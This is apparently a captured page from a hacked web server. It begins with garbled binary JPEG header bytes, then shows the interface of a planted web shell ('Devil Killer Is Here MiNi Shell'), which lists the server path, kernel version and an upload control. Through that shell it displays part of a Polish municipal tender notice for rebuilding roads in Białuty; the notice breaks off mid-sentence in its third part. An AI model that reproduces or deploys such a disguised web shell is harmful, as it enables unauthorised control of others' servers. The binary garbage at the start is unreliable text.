JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210910/0017700902-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa 4 dróg osiedlowych w m. Białuty </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA IŁOWO-OSADA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GMINA IŁOWO-OSADA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wyzwolenia 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iłowo-Osada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">236541014</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">236541014</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ugilowo-osada.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ilowo-osada.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa 4 dróg osiedlowych w m. Białuty </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4483a308-1156-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00177009</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003533/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa 4 dróg osiedlowych w m. Białuty</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.ilowo-osada.biuletyn.net lub https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się przy użyciu strony internetowej pod adresem: miniPortalu https://miniportal.uzp.gov.pl, oraz poczty elektronicznej pod adresem: sekretariat@ugilowo-osada.pl i http://www.ilowo-osada.biuletyn.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w rozdz 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	administratorem danych osobowych Wykonawców oraz osób wskazanych w ofertach jest Zamawiający – Gmina Iłowo-Osada, ul. Wyzwolenia 5, 13-240 Iłowo-Osada.<br/>2)	dane Wykonawców przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia,<br/>3)	odbiorcami danych osobowych przekazanych przez Wykonawców będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania,<br/>4)	dane osobowe zawarte w ofercie będą przechowywane, przez okres 4 lat od dnia zakończenia procedury,<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy lub osób wskazanych w ofercie i załącznikach,<br/>6)	w odniesieniu do danych osobowych zwartych w ofercie decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,<br/>7)	Wykonawca posiada:<br/>1.7.a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>1.7.b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych,<br/>1.7.c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>1.7.d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>8)	Wykonawcy nie przysługuje:<br/>1.8.a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>1.8.b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>1.8.c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z działem 10.6 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.2.2021.PN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi osiedlowej odcinek ,,H-J’’ o długości 0,155km<br/>Przedmiot zamówienia polega na wykonaniu robót budowlanych – roboty drogowe realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>1)	Długość remontowanego odcinka drogi o dł. 0,155 km<br/>Zakres robót obejmuje:<br/>a)	Roboty pomiarowe i inwentaryzacja geodezyjna powykonawcza oraz wznowienie prawnych granic pasa drogowego.<br/>b)	Profilowanie i zagęszczenie istniejącej nawierzchni żwirowej pod górną warstwę podbudowy.<br/>c)	Górna warstwa podbudowa z kruszywa łamanego 0÷31,5mm gr. 15cm.<br/>d)	Regulacja istniejących studni i urządzeń podziemnych. <br/>e)	Skropienie podbudowy z kruszywa łamanego emulsją asfaltową przed ułożeniem warstwy wiążącej.<br/>f)	Wykonanie warstwy wiążącej z betonu asfaltowego AC 16W 50/70 o grubości warstwy po zagęszczeniu 4 cm.<br/>g)	Skropienie nawierzchni emulsją asfaltową przed ułożeniem warstwy ścieralnej.<br/>h)	Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości warstwy po zagęszczeniu 4 cm.<br/>i)	Uzupełnienie poboczy kruszywem pochodzącym z korytowania drogi gr.20 cm po zagęszczeniu.<br/>j)	Pionowe znaki drogowe.D-46 szt.1, D-47 szt.1<br/>k)	Pionowe znaki drogowe słupki do znaków Ø60. szt.1<br/>Uwaga: istniejącą nawierzchnię z kruszywa należy wykorzystać jako dolną warstwę podbudowy i po wyprofilowaniu i zagęszczeniu wzmocnić warstwą kruszywa łamanego 0-31,5mm stabilizowanego mechanicznie w grubości 15 cm po zagęszczeniu<br/>2)	Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. <br/>a)	Załącznik nr 10 cz. 1 SWZ kosztorys ślepy/ofertowy, przedmiar robót, OPIS TECHNICZNY<br/>Plan sytuacyjny, plan sytuacyjny –oznakowanie, przekroje normalne, Szczegółowe Specyfikacje Techniczne Odbioru i Wykonania Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">215 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert jednolite dla każdej z części zamówienia.<br/>16.1.1. Kryteria oceny ofert:<br/>a) kryterium: cena (waga 60%)<br/>Kryterium ceny będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu oferty. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>C min<br/>C = x Zp x Wp<br/>C o<br/>gdzie:	C min	- cena brutto oferty najtańszej (spośród wszystkich złożonych ofert niepodlegających odrzuceniu)<br/>C o	- cena brutto oferty ocenianej<br/>Zp	- znaczenie procentowe kryterium, tu: 60,0%<br/>Wp	- waga punktowa kryterium, tu: 100 pkt.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 60,0 pkt.<br/>Punktacja będzie liczona z zaokrągleniem do dwóch miejsc po przecinku.<br/>b) kryterium: okres gwarancji (waga 40%).<br/>Kryterium okres gwarancji, będzie rozpatrywane na podstawie zadeklarowanej ilości lat (miesięcy) gwarancji na wykonany przedmiot zamówienia, podanej przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający zastrzega, że minimalny okres gwarancji wynosi 3 lata (36 miesiący). Zaoferowanie terminu gwarancji krótszego niż 3 lata spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ. Najdłuższy możliwy okres gwarancji wynosi 5 lat (60 miesięcy).<br/>Punkty w kryterium „Okres gwarancji” zostaną przyznane w ten sposób, że dla terminu gwarancji 3,5 roku (42 miesiące) Wykonawca otrzyma 10 pkt., z zastrzeżeniem, że za 3 lata (36 miesięcy) gwarancji Wykonawcy nie zostaną przyznane punkty (0 pkt.), a za 5 lat (60 miesięcy) zostanie przyznanych 40 punktów.<br/>Punkty zostaną przyznane w poniższy sposób:<br/>Gwarancja (G)– waga 40 %<br/>60 miesięcy (5 lat) – 40 pkt.<br/> 54 miesięcy (4,5 roku) – 30 pkt.<br/>48 miesięcy (4 lat) – 20 pkt.	<br/>42 miesięcy (3,5 roku) – 10 pkt.<br/>36 miesięcy (3 lata)- 0 pkt. <br/>UWAGA: Jeżeli Wykonawca nie zadeklaruje żadnego okresu gwarancji, to zostanie mu przyznane 0 pkt. i Zamawiający uzna, że Wykonawca zadeklarował minimalny wymagany okres gwarancji, tj. 3 lata.<br/>Każda z części będzie oceniana odrębnie<br/>Ocena końcowa każdej oferty zostanie obliczona, jako suma punktów uzyskanych w poszczególnych kryteriach oceny ofert, na podstawie poniższego wzoru:<br/> P = C + G<br/>C – Cena<br/> G - Okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi osiedlowej odcinek ,,F-I’’ o długości 0,0635km<br/>Przedmiot zamówienia polega na wykonaniu robót budowlanych – roboty drogowe realizowane na podstawie Zgłoszenia robót budowlanych na ww. zadanie realizowane w formie ryczałtowej w zakresie: <br/>1)	Długość przebudowywanego odcinka drogi o dł 0,0635 km.<br/>Zakres robót obejmuje: <br/>a)	Roboty pomiarowe i inwentaryzacja geodezyjna powykonawcza oraz wznowienie prawnych granic pasa drogowego.<br/>b)	Rozebranie nawierzchni z płyt drogowych betonowych.<br/>c)	Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadunku i rozładunku na odl. 2km.<br/>d)	Wykonanie koryta gł. 30 cm z wywiezieniem urobku na odkład do 2km do wykorzystania na pobocza.<br/>e)	Wykonanie podsypki piaskowej gr. 10cm po zagęszczeniu.<br/>f)	Podbudowa z kruszywa łamanego 0÷31,5 mm<br/>g)	Regulacja istniejących studni i urządzeń podziemnych.<br/>h)	Skropienie podbudowy z kruszywa łamanego emulsją asfaltową przed ułożeniem warstwy wiążącej.<br/>i)	Wykonanie warstwy wiążącej z betonu asfaltowego AC 16W 50/70 o grubości warstwy po zagęszczeniu 4 cm.<br/>j)	Skropienie nawierzchni emulsją asfaltową przed ułożeniem warstwy ścieralnej.<br/>k)	Wykonanie warstwy ścieralnej nawierzchni z betonu asfaltowego AC 11S 50/70 przy grubości warstwy pozagęszczaniu 4 cm.<br/>l)	Uzupełnienie poboczy kruszywem pochodzącym z korytowania drogi gr. 10 cm po zagęszczeniu.<br/>m)	Pionowe znaki drogowe.A-7 szt.1<br/>n)	Pionowe znaki drogowe słupki do znaków Ø60. szt.1<br/><br/>2)	Przedmiot zamówienia w zakresie szczegółowym określa dokumentacja projektowa do zgłoszenia budowy tj. <br/>a)	Załącznik nr 10 cz. 2 SWZ kosztorys ślepy/ofertowy, przedmiar robót, OPIS TECHNICZNY<br/>Plan sytuacyjny, plan sytuacyjny –oznakowanie, przekroje normalne, Szczegółowe Specyfikacje Techniczne Odbioru i Wykonania Robót Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">215 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert jednolite dla każdej z części zamówienia.<br/>16.1.1. Kryteria oceny ofert:<br/>a) kryterium: cena (waga 60%)<br/>Kryterium ceny będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu oferty. Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/>C min<br/>C = x Zp x Wp<br/>C o<br/>gdzie:	C min	- cena brutto oferty najtańszej (spośród wszystkich złożonych ofert niepodlegających odrzuceniu)<br/>C o	- cena brutto oferty ocenianej<br/>Zp	- znaczenie procentowe kryterium, tu: 60,0%<br/>Wp	- waga punktowa kryterium, tu: 100 pkt.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 60,0 pkt.<br/>Punktacja będzie liczona z zaokrągleniem do dwóch miejsc po przecinku.<br/>b) kryterium: okres gwarancji (waga 40%).<br/>Kryterium okres gwarancji, będzie rozpatrywane na podstawie zadeklarowanej ilości lat (miesięcy) gwarancji na wykonany przedmiot zamówienia, podanej przez Wykonawcę w Formularzu Oferty.<br/>Zamawiający zastrzega, że minimalny okres gwarancji wynosi 3 lata (36 miesiący). Zaoferowanie terminu gwarancji krótszego niż 3 lata spowoduje odrzucenie oferty, jako niezgodnej z treścią SWZ. Najdłuższy możliwy okres gwarancji wynosi 5 lat (60 miesięcy).<br/>Punkty w kryterium „Okres gwarancji” zostaną przyznane w ten sposób, że dla terminu gwarancji 3,5 roku (42 miesiące) Wykonawca otrzyma 10 pkt., z zastrzeżeniem, że za 3 lata (36 miesięcy) gwarancji Wykonawcy nie zostaną przyznane punkty (0 pkt.), a za 5 lat (60 miesięcy) zostanie przyznanych 40 punktów.<br/>Punkty zostaną przyznane w poniższy sposób:<br/>Gwarancja (G)– waga 40 %<br/>60 miesięcy (5 lat) – 40 pkt.<br/> 54 miesięcy (4,5 roku) – 30 pkt.<br/>48 miesięcy (4 lat) – 20 pkt.	<br/>42 miesięcy (3,5 roku) – 10 pkt.<br/>36 miesięcy (3 lata)- 0 pkt. <br/>UWAGA: Jeżeli Wykonawca nie zadeklaruje żadnego okresu gwarancji, to zostanie mu przyznane 0 pkt. i Zamawiający uzna, że Wykonawca zadeklarował minimalny wymagany okres gwarancji, tj. 3 lata.<br/>Każda z części będzie oceniana odrębnie<br/>Ocena końcowa każdej oferty zostanie obliczona, jako suma punktów uzyskanych w poszczególnych kryteriach oceny ofert, na podstawie poniższego wzoru:<br/> P = C + G<br/>C – Cena<br/> G - Okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi osiedlowej odcinek ,,O-P’’ o długości 0,034km<br/>Przedmiot zamówienia polega na 